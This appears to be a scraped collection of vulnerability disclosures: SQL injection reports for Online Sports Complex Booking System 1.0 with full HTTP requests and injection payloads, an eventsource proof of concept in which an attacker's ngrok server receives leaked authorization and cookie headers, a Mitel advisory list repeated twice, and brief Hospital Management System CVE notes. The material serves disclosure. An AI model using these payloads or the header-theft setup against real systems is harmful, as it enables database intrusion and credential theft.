Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via \scbs\classes\Master.php?f=delete_category.

Permalink

Cannot retrieve contributors at this time

**Online Sports Complex Booking System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html

Vulnerability File: \\scbs\\classes\\Master.php?f=delete\_category

Vulnerability location: /scbs/classes/Master.php?f=delete\_category, id

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

POST /scbs/classes/Master.php?f\=delete\_category HTTP/1.1
Host: 192.168.1.19
Content\-Length: 65
Accept: application/json, text/javascript, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.19
Referer: http://192.168.1.19/scbs/admin/?page=categories
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=p5eujbkhl692v4hpr6ltptnq06
Connection: close
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

CVE-2022-29985: bug_report/SQLi-1.md at main · k0xx11/bug_report

Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via /scbs/admin/?page=clients/manage_client&id=.

Permalink

Cannot retrieve contributors at this time

**Online Sports Complex Booking System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html

Vulnerability File: /scbs/admin/?page=clients/manage\_client&id=

Vulnerability location: /scbs/admin/?page=clients/manage\_client&id=, id

Current database name: scbs\_db,length is 7

\[+\] Payload: /scbs/admin/?page=clients/manage\_client&id=1%27%20and%20length(database())%20=7%20--+

GET /scbs/admin/?page\=clients/manage\_client&id\=1%27%20and%20length(database())%20\=7%20\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=gp584rjk4ugbjakmto03cu7pco
Connection: close
// Leak place ---> id

When length (database ()) = 6, Content-Length: 24661 

When length (database ()) = 7, Content-Length: 24718

CVE-2022-29995: bug_report/SQLi-9.md at main · k0xx11/bug_report

Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via /scbs/admin/bookings/view_booking.php?id=.

Permalink

Cannot retrieve contributors at this time

**Online Sports Complex Booking System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html

Vulnerability File: /scbs/admin/bookings/view\_booking.php?id=

Vulnerability location: /scbs/admin/bookings/view\_booking.php?id=, id

Current database name: scbs\_db,length is 7

\[+\] Payload: /scbs/admin/bookings/view\_booking.php?id=4%27%20and%20length(database())%20=7%20--+

GET /scbs/admin/bookings/view\_booking.php?id\=4%27%20and%20length(database())%20\=7%20\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=gp584rjk4ugbjakmto03cu7pco
Connection: close
// Leak place ---> id

When length (database ()) = 6, Content-Length: 2952 

When length (database ()) = 7, Content-Length: 2460

CVE-2022-29993: bug_report/SQLi-8.md at main · k0xx11/bug_report

Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository eventsource/eventsource prior to v2.0.2.

**Exposure of Sensitive Information to an Unauthorized Actor in EventSource/eventsource**

> Reported on Feb 6th 2022 | Timothee Desurmont

Vulnerability type: CWE-200

**Bug**

Cookies & Authorisation headers are leaked to external sites.

**Description**

When fetching an url with a link to an external site (Redirect), the users Cookies & Autorisation headers are leaked to the third party application. According to the same-origin-policy, the header should be "sanitized".

**Proof of Concept**

1.  Start a nodejs server (attacker):

        const express = require('express')
        const app = express()
    
        app.get('/', function (req, res) {
            console.log(req.headers);
            res.status(200).send()
        })
    
        app.listen(3000)
    
        console.log('listening on port 3000');
    

2.  lunch ngrok (attacker):

    ngrok http 3000
    Session Status                online                                                                     
    Account                       Timothee Desurmont (Plan: Free)                                            
    Update                        update available (version 2.3.40, Ctrl-U to update)                        
    Version                       2.3.35                                                                     
    Region                        United States (us)                                                         
    Web Interface                 http://127.0.0.1:4040                                                      
    Forwarding                    http://cb45-92-98-215-185.ngrok.io -> http://localhost:3000                
    Forwarding                    https://cb45-92-98-215-185.ngrok.io -> http://localhost:3000               
                                                                                                             
    Connections                   ttl     opn     rt1     rt5     p50     p90                                
                                  1       0       0.00    0.00    8.92    8.92                               
                                                                                                             
    HTTP Requests                                                                                            
    -------------                                                                                            
                                                                                                             
    GET /                          200 OK  
    

3.  Add a redirect.php file in \var\www\html (mysite)

        $redirect_url = $_GET['url'];
        header("Location: " . $redirect_url);
    

4.  Run below code (mysite)

        const EventSource = require("eventsource")
    
        const mysite = "http://192.168.2.31";
        const attacker = "http://cb45-92-98-215-185.ngrok.io";
    
        const options = {
            method: 'GET',
            headers: {
                'Content-Type': 'application/json'
                ,'Cookie': 'ajs_anonymous_id=1234567890"',
                "Authorization": "Bearer eyJhb12345abcdef"
            }
        };
    
        var es = new EventSource(`${mysite}//redirect.php?url=${attacker}/`, options);
    
        es.onerror = function (err) {
            if (err) {
            if (err.status === 401 || err.status === 403) {
                console.log('not authorized');
            }
            }
        };
    

5.  Responce recived by the attacker

    [nodemon] starting `node server.js`
    listening on port 3000
    {
        host: 'cb45-92-98-215-185.ngrok.io',
        accept: 'text/event-stream',
        authorization: 'Bearer eyJhb12345abcdef',
        'cache-control': 'no-cache',
        'content-type': 'application/json',
        cookie: 'ajs_anonymous_id=1234567890"',
        'x-forwarded-for': '92.98.215.185',
        'x-forwarded-proto': 'http',
        'accept-encoding': 'gzip' 
    }
    

**Consequence**

Access Control: Hijack of victims account.

The attacker can steal the user's credentials and then use these credentials to access the legitimate web site.

**Suggested fix**

If the redirected url is different from the url domain, the Authentication & Cookies should be removed from the header.

**Occurrences**

CVE-2022-1650: Exposure of Sensitive Information to an Unauthorized Actor in eventsource

Mitel 6800 and 6900 Series SIP phone devices through 2022-04-27 have "undocumented functionality." A vulnerability in Mitel 6800 Series and 6900 Series SIP phones excluding 6970, versions 5.1 SP8 (5.1.0.8016) and earlier, and 6.0 (6.0.0.368) through 6.1 HF4 (6.1.0.165), could allow a unauthenticated attacker with physical access to the phone to gain root access due to insufficient access control for test functionality during system startup. A successful exploit could allow access to sensitive information and code execution.

Mitel 6800 Series SIP Phone and 6900 Series SIP Phone Access Control Vulnerability 22-0004 CVE-2022-29855 2022-05-03 2022-05-03 Mitel 6900 Series IP Phone Access Control Vulnerability 22-0003 CVE-2022-29854 2022-05-03 2022-05-12 MiVoice Connect Data Validation Vulnerability 22-0002 CVE-2022-29499 2022-04-19 2022-04-21 MiCollab, MiVoice Business Express Access Control Vulnerability 22-0001 CVE-2022-26143 2022-02-22 2022-03-11 Vulnerability in Apache Log4j Libraries Affecting Mitel Products 21-0010 CVE-2021-44228 CVE-2021-45046 CVE-2021-45105 CVE-2021-44832 CVE-2021-4104 CVE-2022-23302 CVE-2022-23305 CVE-2022-23307 2021-12-13 2022-03-22 Mitel Interaction Call Recording Vulnerability 21-0006 CVE-2021-37586 2021-08-02 2021-08-02 Mitel MiCollab Multiple Security Vulnerabilities 21-0005 CVE-2021-32067 CVE-2021-32072 CVE-2021-32068 CVE-2021-32071 CVE-2021-32069 CVE-2021-32070 2021-05-24 2021-05-24 Mitel MiCollab Multiple Security Vulnerabilities 21-0004 CVE-2021-27402 CVE-2021-27401 2021-03-09 2021-03-09 Mitel MiContact Center Enterprise - Directory Traversal Vulnerability 21-0003 CVE-2021-26714 2021-02-16 2021-02-16 Mitel MiContact Center Business Access Token Vulnerability 21-0002 CVE-2021-3352 2021-02-10 2021-02-10 Mitel BusinessCTI Enterprise - Remote Code Execution Vulnerability 21-0001 CVE-2021-3176 2021-01-25 2021-01-25 Mitel MiCollab NuPoint Messenger Unauthenticated Access Vulnerability 20-0016 CVE-2020-35547 2020-12-29 2020-12-29 Mitel MiCollab Multiple Security Vulnerabilities 20-0015 CVE-2020-25606 CVE-2020-25608 CVE-2020-25609 CVE-2020-25610 CVE-2020-25611 CVE-2020-25612 CVE-2020-27340 2020-11-12 2020-11-02 Mitel MiVoice SIP and MiNet Phones Bluetooth Auto Pair Vulnerability 20-0014 CVE-2020-27639 CVE-2020-27640 2020-11-02 2020-11-02 Mitel MiVoice SIP, MiNet and DECT Phones Information Disclosure (KNOB) Vulnerability 20-0013 CVE-2019-9506 2020-11-02 2020-11-02 Mitel BusinessCTI Enterprise - Remote Code Execution Vulnerability 20-0012 CVE-2020-27154 2020-10-20 2020-10-20 Mitel MiContact Center Business Multiple Security Vulnerabilities 20-0011 CVE-2020-24692 CVE-2020-24693 2020-09-02 2020-09-02 Mitel MiCloud Management Portal Multiple Security Vulnerabilities 20-0010 CVE-2020-24592 CVE-2020-24593 CVE-2020-24594 CVE-2020-24595 2020-08-31 2020-08-31 Mitel Border Gateway update for a Buffer Overflow vulnerability in PPP Daemon 20-0009 CVE-2020-8597 2020-07-07 2020-07-07 Mitel MiCollab Multiple Security Vulnerabilities 20-0008 CVE-2020-13863 CVE-2020-13767 2020-06-25 2020-06-25 Mitel MiVoice 6800 and 6900 series SIP Phones - Memory Disclosure Vulnerability 20-0007 CVE-2020-13617 2020-06-02 2020-06-02 Mitel MiVoice Connect Client - Remote Code Execution Vulnerability 20-0006 CVE-2020-12456 2020-06-01 2020-07-16 MiCollab Multiple Security Vulnerabilities 20-0005 CVE-2020-11798 CVE-2020-11797 2020-04-30 2020-04-30 MiVoice Connect - Remote Code Execution and Weak Encryption Vulnerabilities 20-0004 CVE-2020-10211 CVE-2020-10377 2020-03-31 2020-03-31 Mitel MiContact Center Business with Site Based Security – Authentication Vulnerability 20-0003 CVE-2020-9379 2020-03-02 2020-03-02 Microsoft changes to Default Security Settings for LDAP on Active Directory 20-0002 N/A 2020-02-17 2020-03-30 Mitel 6970 – Port Configuration Vulnerability 20-0001 N/A 2020-01-22 2020-01-22 Mitel SIP-DECT – Encryption key vulnerability 19-0009 CVE-2019-19891 2019-12-27 2019-12-27 Mitel MiCollab for Android – Cross-Site-Scripting (XSS) 19-0008 CVE-2019-19370 2019-12-20 2019-12-20 MiCollab SQL injection and XSS vulnerabilities 19-0007 CVE-2019-19607 CVE-2019-19608 CVE-2019-19371 2019-12-20 2019-12-20 Mitel MiVoice 6800/6900 SIP series phones key length vulnerability 19-0006 CVE-2019-18863 2019-11-22 2019-11-22 Linux Sudo Bypass of User Restrictions Vulnerability 19-0005 CVE-2019-14287 2019-11-12 2019-11-26 MiVoice Business Security Certificate 19-0004 N/A 2019-08-28 2019-08-28 Mitel CMG Suite SQL Injection Vulnerability 19-0003 CVE-2018-18285 CVE-2018-18286 2019-03-29 2019-03-29 InAttend and CMG Suite Password Vulnerability 19-0002 CVE-2018-19275 2019-03-29 2019-03-29 Mitel MiVoice 6800 and 6900 SIP series phones weak authentication vulnerability 19-0001 N/A 2019-03-19 2019-03-19 MiCollab Authorization Vulnerability 18-0012 CVE-2018-18819 2018-10-31 2018-10-31 MiCollab SQL Injection and Stored XSS vulnerabilities 18-0011 N/A 2018-10-31 2018-10-31 Apache Struts 2 Remote Code Execution Vulnerability 18-0010 CVE-2018-11776 2018-10-31 2018-10-31 MiVoice 5300 IP Series Phone Denial of Service Vulnerability 18-0009 CVE-2018-15497 2018-09-25 2018-09-25 MiVoice Office 400 Reflected XSS Vulnerability 18-0008 CVE-2018-16226 2018-09-04 2018-09-04 ST 14.2 Reflected XSS Vulnerability 18-0007 CVE-2018-12901 2018-09-04 2018-09-04 Side-Channel Analysis, Spectre Variant 4 and 3a 18-0006 CVE-2018-3640 2018-05-23 2018-06-26 Mitel for Salesforce XSS Vulnerability 18-0005 N/A 2018-03-06 2018-03-06 Connect OnSite and ST 14.2 Multiple PHP Vulnerabilities 18-0004 CVE-2018-5779 CVE-2018-5780 CVE-2018-5781 CVE-2018-5782 CVE-2017-16250 CVE-2017-16251 2018-03-06 2018-03-06 MiVoice Connect and ST 14.2 SQL Injection and Reflected XSS Vulnerabilities 18-0003 CVE-2018-9101 CVE-2018-9102 CVE-2018-9103 CVE-2018-9104 2018-01-31 2018-01-31 XML External Entity (XXE) Vulnerability in MiCollab AWV 18-0002 CWE-918 2018-01-31 2018-01-31 Side-Channel Analysis Vulnerabilities 18-0001 CVE-2017-5715 CVE-2017-5753 CVE-2017-5754 2018-01-08 2018-05-08 SSRF/XSPA Vulnerability in MiContact Center Business 17-0012 CWE-918 2017-12-08 2017-12-08 Vulnerability in MiCollab Microsoft Outlook Plugin 17-0011 N/A 2017-10-30 2017-10-30 Multiple Vulnerabilities in MiCollab and MiCollab AWV 17-0010 CWE-20 CWE-79 CWE-93 CWE-307 2017-09-14 2017-09-14 SMB1 Remote Code Execution 17-0009 CWE-306 CWE-862 2017-06-05 2017-06-05 OpenSSL Vulnerabilities in MiCollab Desktop Applications 17-0008 CVE-2016-2183 CVE-2014-0160 2017-06-05 2017-06-05 Unauthorized Access to MiCollab Client 17-0006 CWE-306 CWE-862 2017-06-05 2017-06-05 WannaCry Ransomware Attack 17-0007 N/A 2017-05-23 2017-05-23 Apache Struts Remote Code Execution Vulnerability CVE-2017-5638 17-0004 CVE-2017-5638 2017-03-20 2017-03-20 Multiple Vulnerabilities in MiVoice Conference/Video Phone (UC360) 17-0003 CVE-2015-1538 CVE-2015-1539 CVE-2015-3824 CVE-2015-3826 CVE-2015-3827 CVE-2015-3828 CVE-2015-3829 CVE-2015-3864 2017-02-15 2017-04-03 Privilege Escalation / Remote Code Execution Vulnerability in MiVoice Conference/Video Phone (UC360) 17-0002 CVE-2015-1538 CVE-2015-1539 CVE-2015-3824 CVE-2015-3826 CVE-2015-3827 CVE-2015-3828 CVE-2015-3829 CVE-2015-3864 2017-02-15 2017-02-15 Misuse / Potential Compromise of Certain Mitel Product Certificates 17-0001 CWE-321 2017-02-09 2017-04-03 Vulnerability in Objective Systems ASN1C (CVE-2016-5080) 16-0020 CVE-2016-5080 CWE-190 2016-12-02 2016-12-02 MiCollab Client Web Portal Call Service Vulnerability 16-0018 CWE-284 2016-11-04 2016-11-04 MiCollab Desktop Client Bypasses Windows Firewall 16-0016 CWE-264 2016-11-04 2016-11-04 Unrestricted File Upload in MiCollab AWV 16-0015 CWE-434 2016-11-04 2016-11-04 CVE-2016-5195: Linux Kernel Privilege Escalation 16-0019 CVE-2016-5195 2016-10-27 2016-12-06 Multiple Vulnerabilities in ntpd versions < 4.2.8p8 / < 4.3.93 16-0014 CVE-2016-7979 CVE-2016-4957 CVE-2016-4956 CVE-2016-4954 CVE-2016-4953 CVE-2016-2518 CVE-2016-2106 CVE-2016-1548 CVE-2016-1547 CVE-2016-1550 2016-08-02 2016-08-02 Multiple Vulnerabilities in OpenSSL 16-0013 CVE-2016-2105 CVE-2016-2106 CVE-2016-2107 CVE-2016-2108 CVE-2016-2109 CVE-2016-2176 CVE-2016-2842 2016-07-05 2016-07-05 XSS Vulnerability in MiCollab AWV 16-0012 N/A 2016-06-03 2016-06-03 Multiple Vulnerabilities in ImageMagick 16-0011 CVE-2016-3714 CVE-2016-3715 CVE-2016-3716 CVE-2016-3717 CVE-2016-3718 2016-05-09 2016-06-03 Authentication Bypass and Toll-Fraud on MiVoice Office 250 / Mitel 5000 16-0009 N/A 2016-03-18 2016-03-18 DROWN (OpenSSL vulnerability) - CVE-2016-0800 16-0008 CVE-2016-0800 2016-03-07 2016-03-07 XSS vulnerability in MiCC 7.x 16-0005 N/A 2016-03-07 2016-03-07 NTPD Vulnerabilities 16-0004 CVE-2015-8138 2016-03-07 2016-05-02 glibc: getaddrinfo stack-based buffer overflow (CVE-2015-7547) 16-0007 CVE-2015-7547 2016-02-25 2016-05-02 OpenSSH Client Vulnerabilities 16-0003 CVE-2016-0777 CVE-2016-0778 2016-02-01 2016-02-01 Multiple Weaknesses in Mitel 6700/6800 series SIP phones 16-0002 N/A 2016-02-01 2016-02-01 SQL Injection Vulnerability in MiCollab 16-0001 N/A 2016-02-01 2016-02-01 Java Deserialization Vulnerability 15-0013 N/A 2015-12-04 2016-02-01 Multiple Oracle Java Vulnerabilities 15-0012 CVE-2015-4731 CVE-2015-4732 CVE-2015-4733 CVE-2015-4734 CVE-2015-4748 CVE-2015-4760 CVE-2015-4803 CVE-2015-4805 CVE-2015-4806 CVE-2015-4835 CVE-2015-4840 CVE-2015-4842 CVE-2015-4843 CVE-2015-4844 CVE-2015-4860 CVE-2015-4872 CVE-2015-4881 CVE-2015-4882 CVE-2015-4883 CVE-2015-4893 CVE-2015-4903 CVE-2015-4911 2015-12-04 2016-05-02 Security Advisory for MiCC 15-0007 N/A 2015-11-04 2015-11-04 OpenSSH: authentication limitsbypass (CVE-2015-5600) 15-0009 CVE-2015-5600 2015-09-04 2015-09-04 OpenSSL Alternative Chains Certificate Forgery (CVE-2015-1793) 15-0008 CVE-2015-1793 2015-07-31 2015-07-31 CGI Flaw in MiCollab AWV 15-0006 N/A 2015-07-31 2015-07-31 Weakness in Diffie-Hellman key exchange / Logjam 15-0004 CVE-2015-1716 CVE-2015-4000 2015-07-31 2015-09-29

CVE-2022-29855: Security Advisories

Mitel 6800 Series SIP Phone and 6900 Series SIP Phone Access Control Vulnerability 22-0004 CVE-2022-29855 2022-05-03 2022-05-03 Mitel 6900 Series IP Phone Access Control Vulnerability 22-0003 CVE-2022-29854 2022-05-03 2022-05-03 MiVoice Connect Data Validation Vulnerability 22-0002 CVE-2022-29499 2022-04-19 2022-04-21 MiCollab, MiVoice Business Express Access Control Vulnerability 22-0001 CVE-2022-26143 2022-02-22 2022-03-11 Vulnerability in Apache Log4j Libraries Affecting Mitel Products 21-0010 CVE-2021-44228 CVE-2021-45046 CVE-2021-45105 CVE-2021-44832 CVE-2021-4104 CVE-2022-23302 CVE-2022-23305 CVE-2022-23307 2021-12-13 2022-03-22 Mitel Interaction Call Recording Vulnerability 21-0006 CVE-2021-37586 2021-08-02 2021-08-02 Mitel MiCollab Multiple Security Vulnerabilities 21-0005 CVE-2021-32067 CVE-2021-32072 CVE-2021-32068 CVE-2021-32071 CVE-2021-32069 CVE-2021-32070 2021-05-24 2021-05-24 Mitel MiCollab Multiple Security Vulnerabilities 21-0004 CVE-2021-27402 CVE-2021-27401 2021-03-09 2021-03-09 Mitel MiContact Center Enterprise - Directory Traversal Vulnerability 21-0003 CVE-2021-26714 2021-02-16 2021-02-16 Mitel MiContact Center Business Access Token Vulnerability 21-0002 CVE-2021-3352 2021-02-10 2021-02-10 Mitel BusinessCTI Enterprise - Remote Code Execution Vulnerability 21-0001 CVE-2021-3176 2021-01-25 2021-01-25 Mitel MiCollab NuPoint Messenger Unauthenticated Access Vulnerability 20-0016 CVE-2020-35547 2020-12-29 2020-12-29 Mitel MiCollab Multiple Security Vulnerabilities 20-0015 CVE-2020-25606 CVE-2020-25608 CVE-2020-25609 CVE-2020-25610 CVE-2020-25611 CVE-2020-25612 CVE-2020-27340 2020-11-12 2020-11-02 Mitel MiVoice SIP and MiNet Phones Bluetooth Auto Pair Vulnerability 20-0014 CVE-2020-27639 CVE-2020-27640 2020-11-02 2020-11-02 Mitel MiVoice SIP, MiNet and DECT Phones Information Disclosure (KNOB) Vulnerability 20-0013 CVE-2019-9506 2020-11-02 2020-11-02 Mitel BusinessCTI Enterprise - Remote Code Execution Vulnerability 20-0012 CVE-2020-27154 2020-10-20 2020-10-20 Mitel MiContact Center Business Multiple Security Vulnerabilities 20-0011 CVE-2020-24692 CVE-2020-24693 2020-09-02 2020-09-02 Mitel MiCloud Management Portal Multiple Security Vulnerabilities 20-0010 CVE-2020-24592 CVE-2020-24593 CVE-2020-24594 CVE-2020-24595 2020-08-31 2020-08-31 Mitel Border Gateway update for a Buffer Overflow vulnerability in PPP Daemon 20-0009 CVE-2020-8597 2020-07-07 2020-07-07 Mitel MiCollab Multiple Security Vulnerabilities 20-0008 CVE-2020-13863 CVE-2020-13767 2020-06-25 2020-06-25 Mitel MiVoice 6800 and 6900 series SIP Phones - Memory Disclosure Vulnerability 20-0007 CVE-2020-13617 2020-06-02 2020-06-02 Mitel MiVoice Connect Client - Remote Code Execution Vulnerability 20-0006 CVE-2020-12456 2020-06-01 2020-07-16 MiCollab Multiple Security Vulnerabilities 20-0005 CVE-2020-11798 CVE-2020-11797 2020-04-30 2020-04-30 MiVoice Connect - Remote Code Execution and Weak Encryption Vulnerabilities 20-0004 CVE-2020-10211 CVE-2020-10377 2020-03-31 2020-03-31 Mitel MiContact Center Business with Site Based Security – Authentication Vulnerability 20-0003 CVE-2020-9379 2020-03-02 2020-03-02 Microsoft changes to Default Security Settings for LDAP on Active Directory 20-0002 N/A 2020-02-17 2020-03-30 Mitel 6970 – Port Configuration Vulnerability 20-0001 N/A 2020-01-22 2020-01-22 Mitel SIP-DECT – Encryption key vulnerability 19-0009 CVE-2019-19891 2019-12-27 2019-12-27 Mitel MiCollab for Android – Cross-Site-Scripting (XSS) 19-0008 CVE-2019-19370 2019-12-20 2019-12-20 MiCollab SQL injection and XSS vulnerabilities 19-0007 CVE-2019-19607 CVE-2019-19608 CVE-2019-19371 2019-12-20 2019-12-20 Mitel MiVoice 6800/6900 SIP series phones key length vulnerability 19-0006 CVE-2019-18863 2019-11-22 2019-11-22 Linux Sudo Bypass of User Restrictions Vulnerability 19-0005 CVE-2019-14287 2019-11-12 2019-11-26 MiVoice Business Security Certificate 19-0004 N/A 2019-08-28 2019-08-28 Mitel CMG Suite SQL Injection Vulnerability 19-0003 CVE-2018-18285 CVE-2018-18286 2019-03-29 2019-03-29 InAttend and CMG Suite Password Vulnerability 19-0002 CVE-2018-19275 2019-03-29 2019-03-29 Mitel MiVoice 6800 and 6900 SIP series phones weak authentication vulnerability 19-0001 N/A 2019-03-19 2019-03-19 MiCollab Authorization Vulnerability 18-0012 CVE-2018-18819 2018-10-31 2018-10-31 MiCollab SQL Injection and Stored XSS vulnerabilities 18-0011 N/A 2018-10-31 2018-10-31 Apache Struts 2 Remote Code Execution Vulnerability 18-0010 CVE-2018-11776 2018-10-31 2018-10-31 MiVoice 5300 IP Series Phone Denial of Service Vulnerability 18-0009 CVE-2018-15497 2018-09-25 2018-09-25 MiVoice Office 400 Reflected XSS Vulnerability 18-0008 CVE-2018-16226 2018-09-04 2018-09-04 ST 14.2 Reflected XSS Vulnerability 18-0007 CVE-2018-12901 2018-09-04 2018-09-04 Side-Channel Analysis, Spectre Variant 4 and 3a 18-0006 CVE-2018-3640 2018-05-23 2018-06-26 Mitel for Salesforce XSS Vulnerability 18-0005 N/A 2018-03-06 2018-03-06 Connect OnSite and ST 14.2 Multiple PHP Vulnerabilities 18-0004 CVE-2018-5779 CVE-2018-5780 CVE-2018-5781 CVE-2018-5782 CVE-2017-16250 CVE-2017-16251 2018-03-06 2018-03-06 MiVoice Connect and ST 14.2 SQL Injection and Reflected XSS Vulnerabilities 18-0003 CVE-2018-9101 CVE-2018-9102 CVE-2018-9103 CVE-2018-9104 2018-01-31 2018-01-31 XML External Entity (XXE) Vulnerability in MiCollab AWV 18-0002 CWE-918 2018-01-31 2018-01-31 Side-Channel Analysis Vulnerabilities 18-0001 CVE-2017-5715 CVE-2017-5753 CVE-2017-5754 2018-01-08 2018-05-08 SSRF/XSPA Vulnerability in MiContact Center Business 17-0012 CWE-918 2017-12-08 2017-12-08 Vulnerability in MiCollab Microsoft Outlook Plugin 17-0011 N/A 2017-10-30 2017-10-30 Multiple Vulnerabilities in MiCollab and MiCollab AWV 17-0010 CWE-20 CWE-79 CWE-93 CWE-307 2017-09-14 2017-09-14 SMB1 Remote Code Execution 17-0009 CWE-306 CWE-862 2017-06-05 2017-06-05 OpenSSL Vulnerabilities in MiCollab Desktop Applications 17-0008 CVE-2016-2183 CVE-2014-0160 2017-06-05 2017-06-05 Unauthorized Access to MiCollab Client 17-0006 CWE-306 CWE-862 2017-06-05 2017-06-05 WannaCry Ransomware Attack 17-0007 N/A 2017-05-23 2017-05-23 Apache Struts Remote Code Execution Vulnerability CVE-2017-5638 17-0004 CVE-2017-5638 2017-03-20 2017-03-20 Multiple Vulnerabilities in MiVoice Conference/Video Phone (UC360) 17-0003 CVE-2015-1538 CVE-2015-1539 CVE-2015-3824 CVE-2015-3826 CVE-2015-3827 CVE-2015-3828 CVE-2015-3829 CVE-2015-3864 2017-02-15 2017-04-03 Privilege Escalation / Remote Code Execution Vulnerability in MiVoice Conference/Video Phone (UC360) 17-0002 CVE-2015-1538 CVE-2015-1539 CVE-2015-3824 CVE-2015-3826 CVE-2015-3827 CVE-2015-3828 CVE-2015-3829 CVE-2015-3864 2017-02-15 2017-02-15 Misuse / Potential Compromise of Certain Mitel Product Certificates 17-0001 CWE-321 2017-02-09 2017-04-03 Vulnerability in Objective Systems ASN1C (CVE-2016-5080) 16-0020 CVE-2016-5080 CWE-190 2016-12-02 2016-12-02 MiCollab Client Web Portal Call Service Vulnerability 16-0018 CWE-284 2016-11-04 2016-11-04 MiCollab Desktop Client Bypasses Windows Firewall 16-0016 CWE-264 2016-11-04 2016-11-04 Unrestricted File Upload in MiCollab AWV 16-0015 CWE-434 2016-11-04 2016-11-04 CVE-2016-5195: Linux Kernel Privilege Escalation 16-0019 CVE-2016-5195 2016-10-27 2016-12-06 Multiple Vulnerabilities in ntpd versions < 4.2.8p8 / < 4.3.93 16-0014 CVE-2016-7979 CVE-2016-4957 CVE-2016-4956 CVE-2016-4954 CVE-2016-4953 CVE-2016-2518 CVE-2016-2106 CVE-2016-1548 CVE-2016-1547 CVE-2016-1550 2016-08-02 2016-08-02 Multiple Vulnerabilities in OpenSSL 16-0013 CVE-2016-2105 CVE-2016-2106 CVE-2016-2107 CVE-2016-2108 CVE-2016-2109 CVE-2016-2176 CVE-2016-2842 2016-07-05 2016-07-05 XSS Vulnerability in MiCollab AWV 16-0012 N/A 2016-06-03 2016-06-03 Multiple Vulnerabilities in ImageMagick 16-0011 CVE-2016-3714 CVE-2016-3715 CVE-2016-3716 CVE-2016-3717 CVE-2016-3718 2016-05-09 2016-06-03 Authentication Bypass and Toll-Fraud on MiVoice Office 250 / Mitel 5000 16-0009 N/A 2016-03-18 2016-03-18 DROWN (OpenSSL vulnerability) - CVE-2016-0800 16-0008 CVE-2016-0800 2016-03-07 2016-03-07 XSS vulnerability in MiCC 7.x 16-0005 N/A 2016-03-07 2016-03-07 NTPD Vulnerabilities 16-0004 CVE-2015-8138 2016-03-07 2016-05-02 glibc: getaddrinfo stack-based buffer overflow (CVE-2015-7547) 16-0007 CVE-2015-7547 2016-02-25 2016-05-02 OpenSSH Client Vulnerabilities 16-0003 CVE-2016-0777 CVE-2016-0778 2016-02-01 2016-02-01 Multiple Weaknesses in Mitel 6700/6800 series SIP phones 16-0002 N/A 2016-02-01 2016-02-01 SQL Injection Vulnerability in MiCollab 16-0001 N/A 2016-02-01 2016-02-01 Java Deserialization Vulnerability 15-0013 N/A 2015-12-04 2016-02-01 Multiple Oracle Java Vulnerabilities 15-0012 CVE-2015-4731 CVE-2015-4732 CVE-2015-4733 CVE-2015-4734 CVE-2015-4748 CVE-2015-4760 CVE-2015-4803 CVE-2015-4805 CVE-2015-4806 CVE-2015-4835 CVE-2015-4840 CVE-2015-4842 CVE-2015-4843 CVE-2015-4844 CVE-2015-4860 CVE-2015-4872 CVE-2015-4881 CVE-2015-4882 CVE-2015-4883 CVE-2015-4893 CVE-2015-4903 CVE-2015-4911 2015-12-04 2016-05-02 Security Advisory for MiCC 15-0007 N/A 2015-11-04 2015-11-04 OpenSSH: authentication limitsbypass (CVE-2015-5600) 15-0009 CVE-2015-5600 2015-09-04 2015-09-04 OpenSSL Alternative Chains Certificate Forgery (CVE-2015-1793) 15-0008 CVE-2015-1793 2015-07-31 2015-07-31 CGI Flaw in MiCollab AWV 15-0006 N/A 2015-07-31 2015-07-31 Weakness in Diffie-Hellman key exchange / Logjam 15-0004 CVE-2015-1716 CVE-2015-4000 2015-07-31 2015-09-29

Hospital Management System in PHP with Source Code (HMS) 1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in room.php.

CVE-2022-30449

Hospital Management System in PHP with Source Code (HMS) 1.0 was discovered to contain a File upload vulnerability in treatmentrecord.php.

Tag

#php